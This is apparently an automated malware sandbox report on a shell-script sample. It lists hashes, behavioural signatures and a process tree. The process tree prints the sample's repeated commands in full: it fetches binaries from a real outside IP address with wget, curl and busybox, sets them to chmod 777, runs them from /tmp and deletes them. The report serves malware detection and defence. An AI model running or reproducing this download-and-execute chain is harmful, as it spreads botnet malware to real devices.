Analysis
-
max time kernel
74s -
max time network
76s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:726
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:747
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:752
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:754
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:759
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:760
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:777
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:787
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:788
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:809
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:817
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:831
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:859
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:865
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:871
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:880
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:886
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:892
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:898
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:904
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:910
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:916
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:922
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:928
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:934
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:940
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:946
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:952
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:958
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:964
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:970
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:973
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:974
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:976
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:979
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:980
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:982
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:985
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:986
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:988
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97